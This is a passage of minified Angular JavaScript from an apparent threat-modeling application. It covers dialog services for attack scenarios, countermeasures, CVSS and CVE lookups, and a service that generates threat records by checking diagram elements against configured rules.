"),m(6,"div",1),s(7,"\n    "),m(8,"mat-icon",2),s(9),u(),s(10," \n    "),ne(11,KPe,3,3,"ng-container",3),s(12,"\n    "),ne(13,XPe,3,3,"ng-container",3),s(14,"\n  "),u(),s(15,"\n\n  "),ne(16,YPe,24,14,"div",3),s(17,"\n  "),ne(18,JPe,18,9,"div",3),s(19,"\n"),u(),s(20,"\n"),m(21,"mat-dialog-actions",4),s(22,"\n  "),m(23,"button",5),he("click",function(){return i.Change()}),s(24),oe(25,"translate"),u(),s(26,"\n  "),m(27,"button",6),s(28),oe(29,"translate"),u(),s(30,"\n"),u()),2&e&&(C(1),ke(re(2,10,"dialog.passswordprotection.title")),C(8),ke(i.IsEncrypted?"lock":"lock_open_right"),C(2),V("ngIf",i.IsEncrypted),C(2),V("ngIf",!i.IsEncrypted),C(3),V("ngIf",i.IsEncrypted),C(2),V("ngIf",!i.IsEncrypted),C(5),V("disabled",!i.HasChanges),C(1),ke(re(25,12,"dialog.passswordprotection.Change")),C(3),V("mat-dialog-close",!0),C(1),ke(re(29,14,"general.Close")))},dependencies:[Ri,an,Ta,Ea,oa,br,da,nn,un,jr,Xa,Pa,vm,Am,Tm,Em,Xi],styles:[".field-width[_ngcontent-%COMP%]{width:355px}"]}),t})();class ff{}class E2{}class S5{}class k5{}class P5{}let Wn=(()=>{class t{constructor(e,i,n,r){this.dialog=e,this.translate=i,this.dataService=n,this.locStorage=r}OpenTwoOptionsDialog(e,i=!1,n=null,r=null){return this.dialog.open(_M,{hasBackdrop:i,data:e,width:n,minWidth:r}).afterClosed()}OpenUnsavedChangesDialog(){const e={title:this.translate.instant("dialog.unsaved.title"),textContent:this.translate.instant("dialog.unsaved.saveProject"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!0};return this.OpenTwoOptionsDialog(e)}OpenDeleteDialog(e){const i={title:this.translate.instant("dialog.delete.deleteItem")+" "+e,textContent:this.translate.instant("dialog.delete.sure"),resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};return this.OpenTwoOptionsDialog(i)}OpenDeleteObjectDialog(e){let i=MG.FindAllReferencesDeep(e,this.dataService.Project,this.dataService.Config),n=this.translate.instant("dialog.delete.sure");i.length>0&&(n+="\n\n",n+=this.translate.instant("dialog.delete.changes"),i.forEach(c=>{n+="\n"+MG.ToString(c,this.dataService,this.translate)}));const r={title:this.translate.instant("dialog.delete.deleteItem")+" "+e.Name,textContent:n,resultTrueText:this.translate.instant("general.Yes"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.No"),resultTrueEnabled:()=>!0,initalTrue:!1};return this.OpenTwoOptionsDialog(r)}OpenAttackScenarioDialog(e,i,n=null){const r={title:this.translate.instant("pages.modeling.attackscenario.dialogTitle"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!i||e.ThreatCategories.length>0,initalTrue:!1,component:lM,componentInputData:[{Key:Rc,Value:e}]};if(n){r.canIterate=!0;let c=e;const d=new Tt;r.componentInputData.push({Key:Tt,Value:d}),r.canNext=()=>n.indexOf(c)<n.length-1,r.canPrevious=()=>n.indexOf(c)>0,r.onNext=()=>{c=n[n.indexOf(c)+1],d.emit(c)},r.onPrevious=()=>{c=n[n.indexOf(c)-1],d.emit(c)}}return this.OpenTwoOptionsDialog(r)}OpenAddAttackVectorDialog(e){const i={title:this.translate.instant("pages.config.attackVectorEditDialogTitle"),resultTrueText:this.translate.instant("general.Add"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>{var n;return(null===(n=e.Name)||void 0===n?void 0:n.length)>0&&null!=this.dataService.Config.FindGroupOfAttackVector(e)},initalTrue:!1,component:Qg,componentInputData:[{Key:Wp,Value:e}]};return this.OpenTwoOptionsDialog(i)}OpenViewAttackVectorDialog(e,i){const n=new ff;n.Value=i;const r={title:this.translate.instant("pages.config.attackVectorViewDialogTitle"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:Qg,componentInputData:[{Key:Wp,Value:e},{Key:ff,Value:n}]};return this.OpenTwoOptionsDialog(r,!0)}OpenViewThreatRuleDialog(e){const i={title:this.translate.instant("pages.config.threatRuleViewDialogTitle"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:Gp,componentInputData:[{Key:Vp,Value:e}]};return this.OpenTwoOptionsDialog(i,!0)}OpenCVSSEntryDiaglog(e){const i=new k5;i.Value=e;const n={title:this.translate.instant("shared.cvss.name.l"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:Wm,componentInputData:[{Key:k5,Value:i}]};return this.OpenTwoOptionsDialog(n,!0)}OpenOwaspRREntryDiaglog(e){const i=new P5;i.Value=e;const n={title:this.translate.instant("shared.owasprr.name.l"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:IT,componentInputData:[{Key:P5,Value:i}]};return this.OpenTwoOptionsDialog(n,!0)}OpenAddMyDataDialog(e){const i={title:this.translate.instant("dialog.mydata.addDialogTitle"),resultTrueText:this.translate.instant("general.Add"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>{var n;return(null===(n=e.Name)||void 0===n?void 0:n.length)>0&&null!=e.FindAssetGroup()},initalTrue:!1,component:v5,componentInputData:[{Key:Pu,Value:e}]};return this.OpenTwoOptionsDialog(i)}OpenCountermeasureDialog(e,i,n,r=null){let c=new ff;c.Value=i;const d={title:this.translate.instant("pages.modeling.countermeasure.dialogTitle"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!i||null!=e.Control||e.Targets.length>0,initalTrue:!1,component:cM,componentInputData:[{Key:Jl,Value:e},{Key:ff,Value:c},{Key:Array,Value:n}]};if(r){d.canIterate=!0;let T=e;const k=new Tt;d.componentInputData.push({Key:Tt,Value:k}),d.canNext=()=>r.indexOf(T)<r.length-1,d.canPrevious=()=>r.indexOf(T)>0,d.onNext=()=>{T=r[r.indexOf(T)+1],k.emit(T)},d.onPrevious=()=>{T=r[r.indexOf(T)-1],k.emit(T)}}return this.OpenTwoOptionsDialog(d,!1,null,"800px")}OpenTestCaseDialog(e,i,n=null){const r={title:this.translate.instant("general.TestCase"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!0,initalTrue:!1,component:gM,componentInputData:[{Key:Kg,Value:e}]};if(n){r.canIterate=!0;let c=e;const d=new Tt;r.componentInputData.push({Key:Tt,Value:d}),r.canNext=()=>n.indexOf(c)<n.length-1,r.canPrevious=()=>n.indexOf(c)>0,r.onNext=()=>{c=n[n.indexOf(c)+1],d.emit(c)},r.onPrevious=()=>{c=n[n.indexOf(c)-1],d.emit(c)}}return this.OpenTwoOptionsDialog(r,!1,null,"800px")}OpenAddControlDialog(e){const i=new ff;i.Value=!0;const n={title:this.translate.instant("pages.config.control.dialogTitle"),resultTrueText:this.translate.instant("general.Add"),hasResultFalse:!0,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>{var r;return(null===(r=e.Name)||void 0===r?void 0:r.length)>0&&null!=this.dataService.Config.FindGroupOfControl(e)},initalTrue:!1,component:T2,componentInputData:[{Key:Fg,Value:e},{Key:ff,Value:i}]};return this.OpenTwoOptionsDialog(n)}OpenMitigationProcessDialog(e,i){const n={title:this.translate.instant("pages.modeling.mitigationprocess.dialogTitle"),resultTrueText:this.translate.instant(i?"general.Add":"general.Close"),hasResultFalse:i,resultFalseText:this.translate.instant("general.Cancel"),resultTrueEnabled:()=>!0,initalTrue:!1,component:_T,componentInputData:[{Key:zp,Value:e}]};return this.OpenTwoOptionsDialog(n)}OpenSuggestThreatsDialog(e){const i={title:this.translate.instant("pages.modeling.diagram.suggestedthreats.dialogTitle"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!1,component:Fke,componentInputData:[{Key:lc,Value:e}]};return this.OpenTwoOptionsDialog(i,!0,"800px")}OpenCveSearchDialog(e,i){let n=new E2;n.Value=i;const r={title:this.translate.instant("shared.cvesearch.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!1,component:HG,componentInputData:[{Key:Lp,Value:e},{Key:E2,Value:n}]};return this.OpenTwoOptionsDialog(r,!0,"800px")}OpenProgresstrackerDialog(){const e={title:this.translate.instant("dialog.progress.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:WG};return this.OpenTwoOptionsDialog(e)}OpenNotesDialog(e,i=!1,n=!1,r=!1,c=!1){let d=new S5;d.Notes=e,d.HasCheckbox=n,d.ShowTimestamp=i,d.CanToggleTimestamp=r,d.CanToggleCheckbox=c;const T={title:this.translate.instant("general.Notes"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:Qp,componentInputData:[{Key:S5,Value:d}]};return this.OpenTwoOptionsDialog(T,!0,800)}OpenModelInfoDialog(){const e={title:this.translate.instant("dialog.modelinfo.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:w5};return this.OpenTwoOptionsDialog(e)}OpenModelTasksNotesDialog(){const e={title:this.translate.instant("dialog.modelinfo.title")+": "+this.translate.instant("status-bar.TasksAndNotes"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:R5};return this.OpenTwoOptionsDialog(e)}OpenModelChangesDialog(){const e={title:this.translate.instant("dialog.modelinfo.title")+": "+this.translate.instant("dialog.modelchanges.Changes"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:qG};return this.OpenTwoOptionsDialog(e)}OpenPasswordProtectionDialog(){return this.dialog.open(ZPe,{hasBackdrop:!1})}OpenCookieConsentDialog(){const e={title:this.translate.instant("dialog.cookie.title"),textContent:this.translate.instant("dialog.cookie.text"),initalTrue:!1,hasResultFalse:!0,resultTrueText:this.translate.instant("dialog.cookie.consent"),resultFalseText:this.translate.instant("dialog.cookie.reject"),resultTrueEnabled:()=>!0},i=this.OpenTwoOptionsDialog(e,!1,"600px");return i.subscribe(n=>{this.locStorage.Set(si.COOKIE_CONSENT,JSON.stringify(n))}),i}OpenGlossaryDialog(){const e={title:this.translate.instant("side-nav.Glossary"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:BPe};return this.OpenTwoOptionsDialog(e)}OpenRenameDialog(e,i){return this.dialog.open(O9e,{data:{Object:e,Property:i}})}OpenTagChartsDialog(){const e={title:this.translate.instant("dialog.tagcharts.title"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:V9e};return this.OpenTwoOptionsDialog(e,!0,"700px")}OpenViewImageDialog(e,i="700px"){const n=new E2;n.Value=e;const r={title:this.translate.instant("general.Image"),resultTrueText:this.translate.instant("general.Close"),hasResultFalse:!1,resultFalseText:"",resultTrueEnabled:()=>!0,initalTrue:!0,component:PPe,componentInputData:[{Key:E2,Value:n}]};return this.OpenTwoOptionsDialog(r,!0,i)}OpenChangelogDialog(){return this.dialog.open(qPe,{hasBackdrop:!0,width:"1000px"}).afterClosed()}}return t.\u0275fac=function(e){return new(e||t)(At(vu),At(Sn),At(Yi),At(_r))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),RT=(()=>{class t{constructor(e,i){this.dataService=e,this.dialog=i}GenerateAllThreats(){let e=this.dataService.Project;return e.GetDiagrams().forEach(i=>this.GenerateDiagramThreats(i)),e.GetStacks().forEach(i=>this.GenerateStackThreats(i)),e.GetAttackScenarios()}GenerateDiagramThreats(e){if(!e.Elements)return[];let i=this.dataService.Project;i.GetAttackScenarios().filter(d=>d.ViewID==e.ID&&!d.IsGenerated).forEach(d=>d.MappingState=zn.Stable);let n=i.GetAttackScenarios().filter(d=>d.ViewID==e.ID&&d.IsGenerated);n.forEach(d=>d.RuleStillApplies=!0),n.filter(d=>d.MappingState==zn.Removed).forEach(d=>i.DeleteAttackScenario(d)),n=n.filter(d=>d.MappingState!=zn.Removed);let r=(d,T)=>{let k=d.filter(q=>[nl.EachElement,nl.OnceForEachElement].includes(q.RuleGenerationType));T.forEach(q=>{k.forEach(Y=>{this.checkElementAgainstRule(Y,q,T,e.Settings.GenerationAssetBased).forEach(pe=>{var Re;let Fe=this.checkForExistingMapping(Y,pe.target,Y.RuleGenerationType==nl.EachElement?pe.elements:null);if(Fe){Fe.MappingState=zn.Stable;const Ne=n.findIndex(et=>et.ID==Fe.ID);Ne>=0&&n.splice(Ne,1)}else i.CreateAttackScenario(e.ID,!0).SetMapping(null===(Re=Y.AttackVector)||void 0===Re?void 0:Re.ID,Y.ThreatCategories.map(et=>et.ID),pe.target,pe.elements,Y,null,null,null)})})}),k=d.filter(q=>q.RuleGenerationType==nl.OnceForAllElements),k.forEach(q=>{var Y;let te=[];if(T.forEach(pe=>{this.checkElementAgainstRule(q,pe,T,e.Settings.GenerationAssetBased).forEach(Fe=>te.push(...Fe.elements))}),te.length>0){let pe=this.checkForExistingMapping(q,1==te.length?te[0]:null,te);if(pe||(pe=this.checkForExistingMappingWithUpdatedElements(q,1==te.length?te[0]:null,te),pe&&(pe.Targets=te,pe.GetCountermeasures().forEach(Re=>{let Fe=[];Re.AttackScenarios.forEach(Ne=>{Ne.Targets.forEach(et=>{Fe.includes(et)||Fe.push(et)})}),Re.Targets=Fe}))),pe){pe.MappingState=zn.Stable;const Re=n.findIndex(Fe=>Fe.ID==pe.ID);Re>=0&&n.splice(Re,1)}else i.CreateAttackScenario(e.ID,!0).SetMapping(null===(Y=q.AttackVector)||void 0===Y?void 0:Y.ID,q.ThreatCategories.map(Fe=>Fe.ID),1==te.length?te[0]:null,te,q,null,null,null)}})},c=[];if(e.Settings.GenerationThreatLibrary&&c.push(...this.dataService.Config.GetThreatRules().filter(d=>d.IsActive)),Object.keys(e.Settings.GenerationRules).length>0&&Object.keys(e.Settings.GenerationRules).forEach(d=>{const T=k=>{c.push(...k.ThreatRules),k.SubGroups&&k.SubGroups.forEach(q=>T(q))};T(this.dataService.Config.GetThreatRuleGroup(d))}),[xn.Hardware,xn.DataFlow].includes(e.DiagramType)&&r(c.filter(d=>d.RuleType==on.Stencil),e.Elements.GetChildrenFlat().filter(d=>!d.OutOfScope)),e.DiagramType==xn.DataFlow&&r(c.filter(d=>d.RuleType==on.DFD),e.Elements.GetChildrenFlat().filter(d=>d.GetProperty("Type").ElementTypeID==Et.DataFlow&&!d.OutOfScope)),e.DiagramType==xn.DataFlow&&r(c.filter(d=>d.RuleType==on.Protocol),e.Elements.GetChildrenFlat().filter(d=>d.GetProperty("Type").ElementTypeID==Et.DataFlow&&!d.OutOfScope)),Object.keys(e.Settings.GenerationMnemonics).length>0&&[xn.Hardware,xn.DataFlow].includes(e.DiagramType)){const d=e.Elements.GetChildrenFlat().filter(T=>!T.OutOfScope);Object.keys(e.Settings.GenerationMnemonics).map(T=>this.dataService.Config.GetStencilThreatMnemonic(T)).forEach(T=>{d.forEach(k=>{T.Letters.forEach(q=>{var Y;let te=!0;if(e.Settings.GenerationAssetBased&&(te=!1,k.GetProperty("ProcessedData")&&q.threatCategoryID)){const pe=this.dataService.Config.GetThreatCategory(q.threatCategoryID);te=k.GetProperty("ProcessedData").some(Re=>Re.ImpactCats.some(Fe=>pe.ImpactCats.includes(Fe)))}if(q.AffectedElementTypes.includes(k.Type.ElementTypeID)&&te){const pe=i.GetAttackScenarios().filter(Re=>{var Fe;return(null===(Fe=Re.Target)||void 0===Fe?void 0:Fe.ID)==k.ID}).filter(Re=>Re.ThreatMnemonicLetterID==q.ID);pe.length>0?pe.forEach(Re=>{Re.MappingState=zn.Stable;const Fe=n.findIndex(Ne=>Ne.ID==Re.ID);Fe>=0&&n.splice(Fe,1)}):i.CreateAttackScenario(e.ID,!0).SetMapping(null,[null===(Y=T.GetThreatCategory(q))||void 0===Y?void 0:Y.ID],k,[k],null,null,T,q)}})})})}return n.forEach(d=>{d.ThreatState==_o.NotSet?d.MappingState=zn.Removed:d.RuleStillApplies=!1}),i.GetAttackScenarios().filter(d=>d.ViewID==e.ID)}GenerateStackThreats(e){let i=this.dataService.Project;i.GetAttackScenarios().filter(c=>c.ViewID==e.ID&&!c.IsGenerated).forEach(c=>c.MappingState=zn.Stable);let n=i.GetAttackScenarios().filter(c=>c.ViewID==e.ID&&c.IsGenerated);return n.filter(c=>c.MappingState==zn.Removed).forEach(c=>i.DeleteAttackScenario(c)),n=n.filter(c=>c.MappingState!=zn.Removed),(c=>{c.forEach(d=>{this.dataService.Config.GetThreatRules().filter(T=>T.IsActive&&T.RuleType==on.Component&&T.RuleGenerationType==nl.EachElement).forEach(T=>{this.checkElementAgainstRule(T,d,c,!1).forEach(q=>{var Y;let te=this.checkForExistingMapping(T,q.target,q.elements);if(te){te.MappingState=zn.Stable;const pe=n.findIndex(Re=>Re.ID==te.ID);pe>=0&&n.splice(pe,1)}else{const pe=i.CreateAttackScenario(e.ID,!0);let Re=null;1==T.ComponentRestriction.DetailRestrictions.length&&(Re=i.Config.GetThreatQuestions().find(Fe=>Fe.ComponentType.ID==d.Type.ID&&Fe.Property.ID==T.ComponentRestriction.DetailRestrictions[0].PropertyRest.ID)),pe.SetMapping(null===(Y=T.AttackVector)||void 0===Y?void 0:Y.ID,T.ThreatCategories.map(Fe=>Fe.ID),q.target,q.elements,T,Re,null,null)}})})})})(e.GetChildren().filter(c=>!c.OutOfScope)),n.forEach(c=>{c.ThreatState==_o.NotSet?c.MappingState=zn.Removed:c.RuleStillApplies=!1}),i.GetAttackScenarios().filter(c=>c.ViewID==e.ID)}AddMnemonicThreat(e,i){if(e){let n=this.dataService.Project.FindDiagramOfElement(e.ID),r=this.dataService.Project.CreateAttackScenario(n.ID,!1);r.SetMapping("",[],e,[e],null,null,this.dataService.Config.GetStencilThreatMnemonics().find(d=>d.Letters.some(T=>T.ID==i.ID)),i),r.IsGenerated=!1;const c=this.dialog.OpenAttackScenarioDialog(r,!0);return c.subscribe(d=>{d||this.dataService.Project.DeleteAttackScenario(r)}),c}}checkElementAgainstRule(e,i,n,r){var c;if(e.RuleType==on.DFD){let d=(k,q,Y,te=!0)=>{var pe;const Re=te&&(e.DFDRestriction.AppliesReverse||[wn.Both,wn.Initiator].includes(k.ArrowPos));let Fe=e.DFDRestriction.NodeTypes[q+0],Ne=e.DFDRestriction.NodeTypes[q+1],et=!0;Y||(et&&!this.isCorrectNodeType(Fe,k.Sender)&&(et=!1),et&&!this.isCorrectNodeType(Ne,k.Receiver)&&(et=!1)),(Y||!et&&Re)&&(et=Y=!0,Fe=e.DFDRestriction.NodeTypes[e.DFDRestriction.NodeTypes.length-2-q],Ne=e.DFDRestriction.NodeTypes[e.DFDRestriction.NodeTypes.length-1-q],et&&!this.isCorrectNodeType(Fe,k.Receiver)&&(et=!1),et&&!this.isCorrectNodeType(Ne,k.Sender)&&(et=!1));let ut=null===(pe=e.DFDRestriction)||void 0===pe?void 0:pe.NodeRestrictions;if(et=et&&this.evalRestrictions(ut,e.RuleType,k,q),et&&r&&(et=!1,i.GetProperty("ProcessedData")&&e.ThreatCategories)){let Ze=[];e.ThreatCategories.forEach(yt=>Ze.push(...yt.ImpactCats)),et=i.GetProperty("ProcessedData").some(yt=>yt.ImpactCats.some(It=>Ze.includes(It)))}return[et,Y]};const T=i;if(2!=e.DFDRestriction.NodeTypes.length){let k=[],q=(te,pe,Re,Fe)=>{n.filter(et=>et instanceof os).filter(et=>{var ut,Ze;return(null===(ut=et.Sender)||void 0===ut?void 0:ut.ID)==te.ID&&(null===(Ze=et.Receiver)||void 0===Ze?void 0:Ze.ID)!=pe[0].ID}).forEach(et=>{const ut=d(et,Re,Fe,!1);if(ut[0]){let Ze=[...pe,et,et.Receiver];Re+2==e.DFDRestriction.NodeTypes.length?k.push({target:te,elements:Ze}):q(et.Receiver,Ze,Re+1,ut[1])}})};const Y=d(T,0,!1);return Y[0]&&q(T.Receiver,[T.Sender,T,T.Receiver],1,Y[1]),k}{const k=d(T,0,!1);if(k[0]){const q=k[1]?1-e.DFDRestriction.Target:e.DFDRestriction.Target;let Y=T;return 0==q?Y=T.Sender:1==q&&(Y=T.Receiver),[{target:Y,elements:[T.Sender,T,T.Receiver]}]}}return[]}{let d=!0;if(e.RuleType==on.Stencil){const k=this.dataService.Config.GetStencilType(e.StencilRestriction.stencilTypeID);d=k.IsDefault?i.GetProperty("Type").ElementTypeID==k.ElementTypeID:i.GetProperty("Type").ID==e.StencilRestriction.stencilTypeID,d=d&&!(i instanceof td||i instanceof zm)}else e.RuleType==on.Component?d=i.Type.ID==e.ComponentRestriction.componentTypeID:e.RuleType==on.Protocol&&(d=i.ProtocolStack.map(k=>k.ID).includes(e.ProtocolRestriction.protocolID));let T=null===(c=e.StencilRestriction)||void 0===c?void 0:c.DetailRestrictions;return e.RuleType==on.Component&&(T=e.ComponentRestriction.DetailRestrictions),d=d&&this.evalRestrictions(T,e.RuleType,i,0),d?[{target:i,elements:[i]}]:[]}}evalRestrictions(e,i,n,r){if(null==e||0==e.length)return!0;let c=Math.max(...e.map(T=>T.Layer)),d=new Array(e.length);for(d.fill(null,0,e.length);c>=0;){let T=-1,k=!1;for(let q=0;q<e.length;q++)if(e[q].Layer==c&&-1==T?T=q:T>=0&&e[q].Layer!=c&&(k=!0),k||T>=0&&q==e.length-1){let Y=e.slice(T,q==e.length-1?q+1:q);d[T]=[c,Y[Y.length-1].IsOR,this.evalRestrictionWindow(Y,i,n,r)],T=-1,k=!1}c-=1}for(d=d.filter(T=>null!=T),c=Math.max(...e.map(T=>T.Layer));c>=0;){for(let T=1;T<d.length;T++)null!=d[T]&&d[T][0]==c&&(d[T-1][2]=d[T-1][1]?d[T-1][2]||d[T][2]:d[T-1][2]&&d[T][2],d.splice(T,1),T--);c-=1}return d=d.filter(T=>null!=T),0!=d.length&&(d.length>1?void console.error("Only one layer should remain"):d[0][2])}evalRestrictionWindow(e,i,n,r){let c=this.evalRestriction(e[0],i,n,r),d=e[0].IsOR;for(let T=1;T<e.length;T++){let k=this.evalRestriction(e[T],i,n,r);c=d?c||k:c&&k,d=e[T].IsOR}return c}evalRestriction(e,i,n,r){if(e.RestType==ya.Property)return[on.Stencil,on.Component].includes(i)||-1==e.NodeNumber?t.EvalProp(e.PropertyRest,n):e.NodeNumber==r+0?t.EvalProp(e.PropertyRest,n.Sender):e.NodeNumber!=r+1||t.EvalProp(e.PropertyRest,n.Receiver);if(e.RestType==ya.DataFlowCrosses){let c=n.Sender.Parent.ID!=n.Receiver.Parent.ID;return c&&e.DataflowRest.TrustAreaIDs.length>0&&(c=e.DataflowRest.TrustAreaIDs.includes(n.Sender.Parent.GetProperty("Type").ID)||e.DataflowRest.TrustAreaIDs.includes(n.Receiver.Parent.GetProperty("Type").ID)),c}return e.RestType==ya.PhysicalElement?i==on.Stencil?t.EvalProp(e.PhyElementRest.Property,n.PhysicalElement):e.NodeNumber==r+0?t.EvalProp(e.PhyElementRest.Property,n.Sender.PhysicalElement):e.NodeNumber==r+1?t.EvalProp(e.PhyElementRest.Property,n.Receiver.PhysicalElement):e.NodeNumber>=r+2:e.RestType==ya.SenderInterface?!!n.SenderInterface&&t.EvalProp(e.SenderInterfaceRestriction.Property,n.SenderInterface):e.RestType==ya.ReceiverInterface?!!n.ReceiverInterface&&t.EvalProp(e.ReceiverInterfaceRestriction.Property,n.ReceiverInterface):void console.error("Unknown path in evalRestriction()",e,i,n,r)}checkForExistingMapping(e,i,n){return this.dataService.Project.GetAttackScenarios().find(r=>{var c,d;let T=(null===(c=r.ThreatRule)||void 0===c?void 0:c.ID)==e.ID&&(null===(d=r.Target)||void 0===d?void 0:d.ID)==(null==i?void 0:i.ID);if(n&&(T=T&&r.Targets.length==n.length,T))for(let k=0;k<n.length;k++)T=T&&n[k].ID==r.Targets[k].ID;return T})}checkForExistingMappingWithUpdatedElements(e,i,n){return this.dataService.Project.GetAttackScenarios().find(r=>{var c,d;let T=(null===(c=r.ThreatRule)||void 0===c?void 0:c.ID)==e.ID&&(null===(d=r.Target)||void 0===d?void 0:d.ID)==(null==i?void 0:i.ID);if(n&&T)if(n.length>r.Targets.length)for(let k=0;k<r.Targets.length;k++)T=T&&n.includes(r.Targets[k]);else for(let k=0;k<n.length;k++)T=T&&r.Targets.includes(n[k]);return T})}isCorrectNodeType(e,i){if(null==e.TypeIDs||0==e.TypeIDs.length)return!0;let n=!1;return e.TypeIDs.forEach(r=>{let c=this.dataService.Config.GetStencilType(r);n=c.IsDefault?n||i.GetProperty("Type").ElementTypeID==c.ElementTypeID:n||c.ID==i.GetProperty("Type").ID}),n}static EvalProp(e,i){if(!e.ID||!i)return!1;let n=i.GetProperty(e.ID);switch(e.ComparisonType){case cc.EqualsNot:return n!=e.Value;case cc.GreaterThan:return n>=e.Value;case cc.LessThan:return n<=e.Value;case cc.GreaterThanOrEquals:return n>=e.Value;case cc.LessThanOrEquals:return n<=e.Value;default:return n==e.Value}}}return t.\u0275fac=function(e){return new(e||t)(At(Yi),At(Wn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var Xg=(()=>{return(t=Xg||(Xg={}))[t.SWComponent=1]="SWComponent",Xg;var t})();class GG{static GetTypes(){return[Xg.SWComponent]}static ToString(a){return a===Xg.SWComponent?"general.SWComponent":(console.error("Missing ReqFulfillRuleTypesUtil.ToString()"),"Undefined")}}class Yg extends Ln{constructor(a,e){super(a),this.config=e,this.Data.subReqTypeIDs||(this.Data.subReqTypeIDs=[]),this.Data.RequiredPerLevel||(this.Data.RequiredPerLevel=[]),this.Data.ReqFulfillRule||(this.Data.ReqFulfillRule={})}get SubReqTypes(){let a=[];return this.Data.subReqTypeIDs.forEach(e=>a.push(this.config.GetRequirementType(e))),a}get RequiredPerLevel(){return this.Data.RequiredPerLevel}set RequiredPerLevel(a){this.Data.RequiredPerLevel=a}get ReqFulfillRule(){return this.Data.ReqFulfillRule}set ReqFulfillRule(a){this.Data.ReqFulfillRule=a}EvalRequirement(a){if(this.ReqFulfillRule.RuleType==Xg.SWComponent&&this.ReqFulfillRule.SWRule.ComponentTypeID&&this.ReqFulfillRule.SWRule.PropertyRest.ID){let e=a.SoftwareStack.GetChildrenFlat().find(i=>i.Type.ID==this.ReqFulfillRule.SWRule.ComponentTypeID);if(e){const i=RT.EvalProp(this.ReqFulfillRule.SWRule.PropertyRest,e),n=new Array(this.RequiredPerLevel.length).fill(!1);if(i)for(let r=0;r<this.RequiredPerLevel.length;r++)n[r]=this.RequiredPerLevel[r];return n}}return null}AddSubRequirementType(a){this.SubReqTypes.includes(a)||this.Data.subReqTypeIDs.push(a.ID)}RemoveSubRequirementType(a){this.SubReqTypes.includes(a)&&this.Data.subReqTypeIDs.splice(this.Data.subReqTypeIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubReqTypes.forEach(n=>i.push({Type:li.DeleteRequirementType,Param:n})),e.GetChecklistTypes().filter(n=>n.RequirementTypes.find(r=>r.ID==this.ID)).forEach(n=>i.push({Type:li.RemoveRequirementTypeFromChecklistType,Param:n})),null==a||a.GetChecklists().filter(n=>n.Type.GetRequirementTypesFlat().find(r=>r.ID==this.ID)).forEach(n=>i.push({Type:li.RemoveRequirementTypeFromChecklist,Param:n})),i}OnDelete(a,e){let i=e.GetRequirementTypes().find(r=>r.SubReqTypes.some(c=>c.ID==this.ID));i&&i.RemoveSubRequirementType(this),this.FindReferences(a,e).forEach(r=>{if(r.Type==li.DeleteRequirementType)e.DeleteRequirementType(r.Param);else if(r.Type==li.RemoveRequirementTypeFromChecklistType)r.Param.RemoveRequirementType(this);else if(r.Type==li.RemoveRequirementTypeFromChecklist){const c=r.Param.RequirementValues.findIndex(d=>d.RequirementTypeID==this.ID);c>=0&&r.Param.RequirementValues.splice(c,1)}})}static FromJSON(a,e){return new Yg(a,e)}}class Jg extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.Levels&&(this.Levels=[]),this.Data.requirementTypeIDs||(this.Data.requirementTypeIDs=[])}get Levels(){return this.Data.Levels}set Levels(a){this.Data.Levels=a}get RequirementTypes(){let a=[];return this.Data.requirementTypeIDs.forEach(e=>a.push(this.config.GetRequirementType(e))),a}AddRequirementType(a){this.RequirementTypes.includes(a)||this.Data.requirementTypeIDs.push(a.ID)}RemoveRequirementType(a){this.RequirementTypes.includes(a)&&this.Data.requirementTypeIDs.splice(this.Data.requirementTypeIDs.indexOf(a.ID),1)}GetRequirementTypesFlat(){let a=[],e=i=>{i.forEach(n=>{a.push(n),e(n.SubReqTypes)})};return e(this.RequirementTypes),a}FindReferences(a,e){let 